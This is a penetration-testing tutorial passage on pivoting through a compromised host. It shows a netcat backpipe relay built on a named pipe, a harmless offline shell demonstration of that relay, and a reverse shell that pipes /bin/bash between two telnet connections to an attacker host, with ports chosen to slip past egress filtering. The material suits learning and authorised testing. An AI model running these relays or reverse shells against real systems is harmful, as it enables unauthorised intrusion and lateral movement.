Pivoting is a crucial technique in network penetration testing, allowing an attacker to gain access to internal network segments from an already compromised system. This section details common methods for achieving pivoting, focusing on backpipes and Telnet variants.
Pivoting involves using an intermediate compromised host to access other systems or networks that are not directly reachable from the attacker's initial point of compromise. This is essential for lateral movement within a target network.
A backpipe is a netcat (nc) relay built around a named pipe. A shell pipeline carries data in one direction only, so a relay made of two netcats needs a second path for the return traffic; the named pipe supplies it, and the two processes together form a full-duplex channel through the pivot over which commands can be sent and data pulled out.
Before building the relay, create the named pipe (FIFO, first in, first out) in the file system on the pivot; mkfifo does the same job as mknod with the p type. The FIFO is not a buffer in the usual sense: it is the path for the direction of traffic that the | in the pipeline cannot carry.
# To make a FIFO in the file system
mknod [name of file] p
The relay runs on the pivot host: it listens on one port and forwards whatever connects to it to a service on the internal network, carrying the replies back through the FIFO. The attacker then connects to the pivot's listening port and talks to the internal service as if it were directly reachable.
# On the pivot host, after creating the FIFO:
# listen on 4444 and relay each connection to port 80 on an internal host.
# Bytes from the attacker leave the listener's stdout, go through the FIFO
# into the client netcat's stdin; the service's replies come back through |.
nc [internal host] 80 <[FIFO file name] | nc -l -p 4444 >[FIFO file name]
# On the attacker machine: connect to the relay and talk to the internal service
nc -n -v [pivot host] 4444
# The -l -p form is netcat-traditional syntax; OpenBSD-derived builds listen
# with "nc -l 4444", and some of them reject -p combined with -l.
# The relay serves a single connection: when it closes, both netcats exit,
# so wrap the pivot-side line in a loop if you need it more than once.
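To make the data flow concrete, here is an added offline demonstration of the backpipe plumbing; it is not from the original page. The two netcats are replaced by stand-in shell functions, fake_service (plays the client netcat talking to the internal service, and just uppercases what it receives) and fake_listener (plays the listening netcat, with the attacker's side represented by file descriptors 3 and 4), and the "client" traffic is a constructed string, so nothing touches the network. The pipeline in the middle has exactly the shape of the relay above, and the exec 1>&- line shows the one detail that matters when you build such relays by hand: the service only sees end-of-file once every write end of the FIFO is closed.

```shell
#!/bin/sh
# Added demonstration of the backpipe data flow (not the original page's code).
# Stand-ins replace the two netcats so this runs offline:
#   fake_service  plays "nc [internal host] 80"  (uppercases what it receives)
#   fake_listener plays "nc -l -p 4444"; its "client" is fd 3 (in) / fd 4 (out)
# The pipeline shape is the one used on the pivot:  service <backpipe | listener >backpipe

fake_service() {
    tr a-z A-Z          # stdin: requests arriving via the FIFO; stdout: the | pipe
}

fake_listener() {
    cat <&3             # "client" bytes -> our stdout, which is the FIFO
    exec 1>&-           # drop our copy of the FIFO's write end so the service sees EOF
    cat >&4             # service replies arriving on the | pipe -> back to the "client"
}

# relay_demo REQUEST: push REQUEST through the relay and print what comes back.
relay_demo() {
    request=$1
    dir=$(mktemp -d)
    fifo="$dir/backpipe"
    mkfifo "$fifo"                          # same thing as: mknod backpipe p
    printf '%s\n' "$request" >"$dir/req"    # constructed "attacker" traffic
    # forward path: req (fd 3) -> listener stdout -> FIFO -> service stdin
    # return path:  service stdout -> | -> listener stdin -> reply (fd 4)
    fake_service <"$fifo" | ( fake_listener >"$fifo" 3<"$dir/req" 4>"$dir/reply" )
    cat "$dir/reply"
    rm -rf "$dir"
}

relay_demo 'hello from the attacker'   # prints HELLO FROM THE ATTACKER
```

Swap tr for a real service and the two stand-ins for netcat and you have the relay from the page; the FIFO open on each side blocks until the other side opens it, which is why both processes must be started in the same pipeline rather than one after the other.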
When netcat is missing on the target or pivot host, Telnet can sometimes stand in. The difference is not encryption: neither netcat nor telnet protects the traffic, so the commands and the shell's output cross the network in the clear either way. The practical difference is that telnet is only a client and cannot listen, so the shell has to be assembled from two outbound connections.
On the attacker machine, two netcat listeners receive the two halves of the session: one carries commands to the target, the other carries the output back. Ports 80 and 443 are chosen because outbound connections to them are rarely blocked by egress filtering.
# Listen on port 80 in terminal 1 on the attack machine
nc -l -n -v -p 80
# Listen on port 443 in terminal 2 on the attack machine
nc -l -n -v -p 443
On the target, a shell is wired between two telnet clients: whatever the attacker types into the port-80 terminal becomes the shell's stdin, and the shell's output arrives in the port-443 terminal. Without 2>&1 the shell's error messages stay on the target and the attacker never sees them.
# On the target machine (commands arrive on the port-80 connection,
# output and errors leave on the port-443 connection):
telnet [attack host] 80 | /bin/bash 2>&1 | telnet [attack host] 443